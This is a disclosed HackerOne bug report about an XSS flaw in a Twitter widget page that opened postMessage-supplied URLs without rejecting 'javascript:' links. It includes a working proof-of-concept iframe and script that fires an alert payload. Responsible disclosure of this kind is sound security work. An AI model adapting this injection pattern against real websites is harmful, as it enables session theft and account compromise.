Twitter: XSS platform.twitter.com

2014-09-28T18:18:12
ID H1:29328
Type hackerone
Reporter batram
Modified 2014-11-17T14:30:52

Description

Since you have fixed a few problems with the FlashTransport on platform.twitter.com already, I though I would also take a look at the JavaScript around it.

Problem URL: https://platform.twitter.com/widgets/hub.html

Description: The mentioned page opens URLs send to it via postMessage or FlashTransport without checking for an 'javascript:'-prefix, resulting in XSS on platform.twitter.com. Since the URL gets open in a popup, popups need to be allowed or the opening a result of user interaction.

PoC:

<iframe src="https://platform.twitter.com/widgets/hub.html" id="iframe"></iframe>

<script>
  var win = document.getElementById("iframe").contentWindow

  function fire() {
    win.postMessage(
      '{"id": 12, "method": "openIntent", "params":["javascript:alert(document.domain)"]}',
      "https://platform.twitter.com/" 
    )
  }

  function listener(e){
    console.log(e.data);
    if(e.data == '__ready__')
      fire();
  }

  if (window.addEventListener){
    addEventListener("message", listener, false)
  } else {
    attachEvent("onmessage", listener)
  }
</script>

Tested in: Win 8.1 | Google Chrome | Version 39.0.2166.2 dev-m (64-bit)